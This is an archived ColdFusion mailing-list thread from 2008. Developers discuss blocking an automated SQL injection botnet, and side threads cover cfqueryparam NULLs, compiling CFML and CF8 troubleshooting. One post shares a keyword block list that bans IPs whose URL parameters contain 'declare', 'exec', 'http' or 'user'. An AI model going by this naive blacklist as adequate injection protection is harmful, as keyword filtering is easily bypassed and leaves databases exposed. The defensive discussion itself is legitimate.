Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. And it is growing up. Yesterday, my bad bot closed the door to about 50 attacks, and this morning I have 60 reported. Usually I get around 5 only each night. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310351 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
We have CF5 and CFMX versions if anyone wants a copy. I really see having several layers of protection to effectively stop this sort fo thing. Something at the application level sounds like a good first line of defense. I'd be interested in seeing this. Thanks ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310352 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
We handled this attack last month (it never did get through), and starting Tuesday night received about 20 thousands instances (not an exaggeration). Slowing down now for us, but, heh, it's early. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310353 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
blocking specific IP addresses won't get you very far here, because it's a random. blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected the very first attempt, it will save thousands of useless HTTP requests on your sites, because theses robots will scan everything they find. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310354 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:53 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! blocking specific IP addresses won't get you very far here, because it's a random. blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected the very first attempt, it will save thousands of useless HTTP requests on your sites, because theses robots will scan everything they find. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310355 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server). Cheers, Kris ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310356 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
Tuesday night received about 20 thousands instances (not an exaggeration). Slowing down now for us, but, heh, it's early. This is were banning IPs at the first attempt will reduce this pollution. If the attack is detected at the first attempt, and the address banned, the statistics will show only one request per IP address. Otherwise, you will allow the bot to open all your pages, archives, etc. and your server may choke. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310357 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think. Yea I think it is too. I started tracking ip's on a page that I saw always showing up in FusionReactor. This morning I am up to 378 ipaddresses blocked within the last three days. I started out by emailing myself the ip address thinking it would only be a few ips. I cannot believe how bad the issue is... -Randy ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310358 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Interesting. To confirm, you are on Windows XP, right? * YEs I am on XP I expected to see an error message output. If you have reinstalled CF8 (without encountering an errors) *** I just reinstalled this morning and I DID encounter error but when I look in the log it says everything was installed sucessfully. * What the install DID tell me was that port 8500 was in use so port 8501 was used. Is Windows configured to show hidden and system files and folders? ***I'll look again at those folders and see if I can see them now. Are you choosing a custom installation directory? (Anything other than C:\ColdFusion8\) ** Nope And just to confirm once again, are you using the built in web server option, NOT IIS or Apache? Using built in web server. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310359 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV. Well, I'd be happy to, but it is a rather complete and complicated system. It works for all sites/domains on the CF server, uses a database, and is mainly oriented toward bad and unwanted bots elimination. The spam and SQL injection detection is only a small part of it. I can give you this part of code which detects illegal url parameters. The idea is simply to 1. detect if an url parameter is invalid and, 2. if yes, check if there is anything evil in it. In the first case, the request is simply ignored, in the second case, the IP is banned. This code will check if the parameter id is a numeric value: CFIF val(id) EQ 0 AND (id CONTAINS http OR id CONTAINS user OR id CONTAINS declare OR id CONTAINS exec) ... ban this IP address CFABORT CFELSE CFSET id = val(id) /CFIF You may include this code in any page depending on some numeric parameter, ot better: make it a custom tag or CFC. For text parameters, like page names, etc. I simply use: CFIF pTexte CONTAINS http OR pTexte CONTAINS user OR pTexte CONTAINS declare OR pTexte CONTAINS exec For text fields in forms filled by users, a more precise analysis would be needed, but I have none of these on my sites. No one can enter anything if he is not registered. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310360 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
I'd like to know how I can stop the requests from ever hitting the web-server. If you detect the attack at the first request, and block the IP, the bot will not even get the first page, will not see all links in it, and will not search your entire server. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310361 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: HELP! SQL Injection Attack!
Thanks. I was hoping to find an elegant solution that stored the Ips in the application scope for the length of the session timeout and then gracefully removed the banned Ips once the session timed out. I have an idea on what to do, but was looking for a little guidance as I am new to app.cfc and all of its methods. Regards, CV. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:14 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV. Well, I'd be happy to, but it is a rather complete and complicated system. It works for all sites/domains on the CF server, uses a database, and is mainly oriented toward bad and unwanted bots elimination. The spam and SQL injection detection is only a small part of it. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310362 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
CFQueryparam and NULLs.
Quick question: How I would I rewrite this using the built in NULL feature to cfqueryparam? You don't use YesNoFormat with integers, correct? cfif len(trim(form.makeid))cfqueryparam value=#trim(form.makeid)# cfsqltype=cf_sql_integercfelsenull/cfif Thanks, Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310363 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
I was hoping to find an elegant solution that stored the Ips in the application scope for the length of the session timeout and then gracefully removed the banned Ips once the session timed out. How about doing this: - Create a server scope array or list (if you have several sites), or just in the application scope. - add to the array any banned IP, - delete the first element in the array (the oldest), if its length is over a certain maximum based on the idea that the bot is probably operating from an innocent infected PC and will not be a threat for months, so it is not useful to memorize banned addresses for ever. - the length of the array you will keep depends on the amount of attacks you are receiving each day, about 100 or so sounds reasonable. - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the list of banned addresses and CFABORT if yes. -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310364 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: CFQueryparam and NULLs.
If FORM.makeID is either zero or a number: cfqueryparam value=#trim(form.makeid)# cfsqltype=cf_sql_integer null=#NOT FORM.makeID# Maybe throw in a Trim in the null= too. Adrian -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: 07 August 2008 15:47 To: CF-Talk Subject: CFQueryparam and NULLs. Quick question: How I would I rewrite this using the built in NULL feature to cfqueryparam? You don't use YesNoFormat with integers, correct? cfif len(trim(form.makeid))cfqueryparam value=#trim(form.makeid)# cfsqltype=cf_sql_integercfelsenull/cfif Thanks, Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310365 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: CFQueryparam and NULLs.
Here is how I do it. cfqueryparam cfsqltype=CF_SQL_INTEGER value=# trim(form.makeid)# Null=#IsNull(form.makeid)# / IsNull is a function I wrote to check if the value is blank. -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 7:47 AM To: CF-Talk Subject: CFQueryparam and NULLs. Quick question: How I would I rewrite this using the built in NULL feature to cfqueryparam? You don't use YesNoFormat with integers, correct? cfif len(trim(form.makeid))cfqueryparam value=#trim(form.makeid)# cfsqltype=cf_sql_integercfelsenull/cfif Thanks, Che ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310366 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: CFQueryparam and NULLs.
I always use: null=#NOT len(trim(form.whatever))# as that catches everything. Dave -Original Message- From: Adrian Lynch [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:55 AM To: CF-Talk Subject: RE: CFQueryparam and NULLs. If FORM.makeID is either zero or a number: cfqueryparam value=#trim(form.makeid)# cfsqltype=cf_sql_integer null=#NOT FORM.makeID# Maybe throw in a Trim in the null= too. Adrian ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310367 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
Claude Schneegans wrote: - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the list of banned addresses and CFABORT if yes. Just throwing a random thought that occurred to me when I read this. If one cares to be a little nicer and proactive, maybe throw up a very simple and basic, Your system appears to be infect with a bot and it is currently banned from access this site... or something to that affect. The idea being maybe some of the poor souls may learn something. But only if one cares to do so. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310368 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Productizing a Coldfusion web app, question
Hello, I have been working on a web application to sell as a product, is there some way that I can protect the app by making the cfm or cfc files in some kind of binary format? thanks, tom ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310369 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Productizing a Coldfusion web app, question
cfexecute name=C:\CFusionMX\bin\CFCompile.bat arguments=-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot\compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\ /cfexecute Obvisouly make sure you have the right directories -Original Message- From: Tom Jones [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:26 AM To: CF-Talk Subject: Productizing a Coldfusion web app, question Hello, I have been working on a web application to sell as a product, is there some way that I can protect the app by making the cfm or cfc files in some kind of binary format? thanks, tom ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310370 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: help!! = ColdFusion.Window.create Refresh
On Thu, Aug 7, 2008 at 2:20 AM, Rakshith N [EMAIL PROTECTED] wrote: Torsten, This was an issue and has been fixed in 8.0.1. I did a quick check on it and it works fine for me. Are you on 8.0.1? Charlie, Make sure that you use the right case when you use refreshOnShow in JavaScript as JS is case sensitive. Can you share the code that does not seem to work? Hi Rakshith: Thanks for the response. Here's the code I tried: script type=text/javascript function createJournalWindow(transactionID,address) { cfoutput ColdFusion.Window.create('Journal', 'Journal - ' + address, '#myself##viewstate.getvalue('xe.journal')#transactionID=' + transactionID, {height:456,width:416,modal:true,closable:true,draggable:true,resizable:true,center:true,refreshOnShow:true}) /cfoutput } /script being called from the following line that's inside a query-driven cfoutput: a href=## onclick=createJournalWindow(transactionID='#transactionID#',address='#streetAddress1#'); return false; this brings up the same window each time (which is whatever window the user first happened to create). If I change that first argument in the create() method from 'Journal' to transactionID (effectively using the transactionID argument that's passed into the function), it works (bringing up a new window each time). the refreshOnShow in the configs doesn't seem to have any effect. I also tried changing to refreshonshow, which seemed to work in that i saw the Loading with the ajax image each time... but in spite of that it still brought up the same content and same title in the window. i'm relatively new to the AJAX-y stuff in CF, so if i'm misunderstanding how the windows are supposed to work, I apologize in advance :) (running on CF 8,0,1,195765) Thanks, Charlie -- A byte walks into a bar and orders a pint. Bartender asks him What's wrong? Byte says Parity error. Bartender nods and says Yeah, I thought you looked a bit off. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310371 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Charts showing developer edition watermark
So the coldfusion charts on this web site are showing up with the developer edition watermark http://giving.duke.edu/artsandsciences/ Even though it's a licenced install.. Other instances on the server are NOT doing that. Anyone seen this behavior before? -- Rick Root New Brian Vander Ark Album, songs in the music player and cool behind the scenes video at www.myspace.com/brianvanderark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310372 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Productizing a Coldfusion web app, question
Oh, this is cool! Thanks, tom On Aug 7, 2008, at 8:33 AM, Paul Giesenhagen wrote: cfexecute name=C:\CFusionMX\bin\CFCompile.bat arguments=-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot \compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\ /cfexecute Obvisouly make sure you have the right directories -Original Message- From: Tom Jones [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:26 AM To: CF-Talk Subject: Productizing a Coldfusion web app, question Hello, I have been working on a web application to sell as a product, is there some way that I can protect the app by making the cfm or cfc files in some kind of binary format? thanks, tom ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310373 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
Your system appears to be infect with a bot and it is currently banned from access this site... The cherry on the sundae ;-) In this page, I even have a form so the user can give his address and claim his innocence ;-) -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310374 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Productizing a Coldfusion web app, question
Paul Giesenhagen wrote: cfexecute name=C:\CFusionMX\bin\CFCompile.bat arguments=-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot\compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\ /cfexecute Obvisouly make sure you have the right directories Of course you could just run this from the command line yourself, unless you really want to do it by running a CFML template. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310375 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: XMLSearch not thread safe
Yes, the tests I'll be doing tomorrow will be with jmeter. I'll post the results when we have them. On Thu, Aug 7, 2008 at 4:24 PM, Tom Chiverton [EMAIL PROTECTED] wrote: On Wednesday 06 Aug 2008, Brad Wood wrote: iframes aren't good for load testing. Browsers like IE follow spec and only allow 2 concurrent connections to a server at once. Even IE lets you adjust this number in the registry, but I use Apache JMeter tbh. -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310376 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
I'm a little bermused as to why you'd create such a response guys. A bot is attempting the injection attacks yes? It's not likely to be visible to the host computer's owner as far as I can imagine. I suppose it would help **IF** a legitimate user came to your site at a later date from a banned IP, but that's all, or is that why you are doing it? Craig. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: 07 August 2008 16:42 To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Your system appears to be infect with a bot and it is currently banned from access this site... The cherry on the sundae ;-) In this page, I even have a form so the user can give his address and claim his innocence ;-) -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310377 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server). You'd need a web application firewall for this. Any ISAPI solution runs in-process with the web server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310378 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Newb AJAX question
On Thursday 07 Aug 2008, Bret McDermitt wrote: Thanks Tom, my JS is really weak... can you point me to some resources online that would walk me through this? Probably not, sorry, I don't really use JavaScript for this sort of thing anymore, and don't know the details of your server or AJAX library. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310379 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
Craig Dudley wrote: I suppose it would help **IF** a legitimate user came to your site at a later date from a banned IP, but that's all, or is that why you are doing it? Craig. Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310380 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Charts showing developer edition watermark
Never mind, I restarted the instance and it's all good now. Weird. On Thu, Aug 7, 2008 at 11:40 AM, Rick Root [EMAIL PROTECTED] wrote: So the coldfusion charts on this web site are showing up with the developer edition watermark http://giving.duke.edu/artsandsciences/ Even though it's a licenced install.. Other instances on the server are NOT doing that. Anyone seen this behavior before? -- Rick Root New Brian Vander Ark Album, songs in the music player and cool behind the scenes video at www.myspace.com/brianvanderark -- Rick Root New Brian Vander Ark Album, songs in the music player and cool behind the scenes video at www.myspace.com/brianvanderark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310381 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Productizing a Coldfusion web app, question
You're right ... we are actually running multiple commands in this one cfm file so that is our reasoning .. but the command line is yet another way. -Original Message- From: Ian Skinner [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:49 AM To: CF-Talk Subject: Re: Productizing a Coldfusion web app, question Paul Giesenhagen wrote: cfexecute name=C:\CFusionMX\bin\CFCompile.bat arguments=-deploy C:\CFusionMX\wwwroot C:\CFusionMX\wwwroot\compile\tocompile\ C:\CFusionMX\wwwroot\compile\compiled\ /cfexecute Obvisouly make sure you have the right directories Of course you could just run this from the command line yourself, unless you really want to do it by running a CFML template. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310382 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
Craig Dudley wrote: I suppose it would help **IF** a legitimate user came to your site at a later date from a banned IP, but that's all, or is that why you are doing it? Craig. Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon. I idea being that since the users may not be aware of their infection as you mentioned, this just might be the way they find out. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310383 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
I'm a little bermused as to why you'd create such a response guys. Just to make sure I give a chance to a legitimate user, in case my robot detection was a bit too strong. For instance, I also have a test based on the number of HTTP request per second in order to discriminate robots from human. Sometimes, the limit is not easy to set precisely: there are fast humans, and slow robots ;-) -- ___ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: [EMAIL PROTECTED]) Thanks. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310384 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
